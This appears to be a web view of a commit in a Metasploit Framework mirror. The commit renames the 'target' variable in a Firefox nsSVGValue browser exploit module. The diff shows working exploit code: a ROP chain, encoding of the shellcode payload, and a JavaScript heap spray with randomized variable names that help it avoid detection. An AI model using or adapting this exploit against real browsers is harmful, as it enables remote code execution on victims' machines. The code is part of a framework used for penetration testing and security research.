dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Fix broken target (variable naming)

This commit is contained in:
sinn3r 2012-05-17 11:37:49 -05:00
parent 2fccf4674f
commit 952ada1742
1 changed files with 8 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/exploits/windows/browser/mozilla_nssvgvalue.rb
View File

@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# Create the payload # Create the payload
print_status("Creating payload for #{target.name}") print_status("Creating payload for #{my_target.name}")
table = table =
[ [
0x0c0c0c0c, # index 0x0c0c0c0c, # index
@ -194,15 +194,15 @@ class Metasploit3 < Msf::Exploit::Remote
].pack("V*") ].pack("V*")
rop = rand_text_alpha_upper(56) rop = rand_text_alpha_upper(56)
rop << [ target['PopEax'] ].pack("V") rop << [ my_target['PopEax'] ].pack("V")
rop << rand_text_alpha_upper(40) rop << rand_text_alpha_upper(40)
rop << get_rop_chain(target['FF'],target['OS']) rop << get_rop_chain(my_target['FF'],my_target['OS'])
# Encode table, chain and payload # Encode table, chain and payload
rop_js = Rex::Text.to_unescape(table+rop, Rex::Arch.endian(target.arch)) rop_js = Rex::Text.to_unescape(table+rop, Rex::Arch.endian(my_target.arch))
code = payload.encoded code = payload.encoded
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch)) code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch))
# random JavaScript variable names # random JavaScript variable names
i_name = rand_text_alpha(rand(10) + 5) i_name = rand_text_alpha(rand(10) + 5)
@ -240,7 +240,7 @@ class Metasploit3 < Msf::Exploit::Remote
var #{rop_name} = unescape("#{rop_js}"); var #{rop_name} = unescape("#{rop_js}");
var #{code_name} = unescape("#{code_js}"); var #{code_name} = unescape("#{code_js}");
var #{offset_length_name} = #{target['OffSet']}; var #{offset_length_name} = #{my_target['OffSet']};
for (var #{i_name}=0; #{i_name} < 0x300; #{i_name}++) for (var #{i_name}=0; #{i_name} < 0x300; #{i_name}++)
{ {
@ -261,9 +261,9 @@ class Metasploit3 < Msf::Exploit::Remote
var #{single_sprayblock_name} = #{junk_offset_name} + #{rop_name} + #{code_name}; var #{single_sprayblock_name} = #{junk_offset_name} + #{rop_name} + #{code_name};
#{single_sprayblock_name} += #{padding_name}.substring(0,0x800 - #{offset_length_name} - #{rop_name}.length - #{code_name}.length); #{single_sprayblock_name} += #{padding_name}.substring(0,0x800 - #{offset_length_name} - #{rop_name}.length - #{code_name}.length);
while (#{single_sprayblock_name}.length < #{target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name}; while (#{single_sprayblock_name}.length < #{my_target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name};
#{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{target['Size']}-6)/2); #{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{my_target['Size']}-6)/2);
#{varname_name} = "var" + #{randnum1_name}.toString() + #{randnum2_name}.toString(); #{varname_name} = "var" + #{randnum1_name}.toString() + #{randnum2_name}.toString();
#{varname_name} += #{randnum3_name}.toString() + #{randnum4_name}.toString() + #{i_name}.toString(); #{varname_name} += #{randnum3_name}.toString() + #{randnum4_name}.toString() + #{i_name}.toString();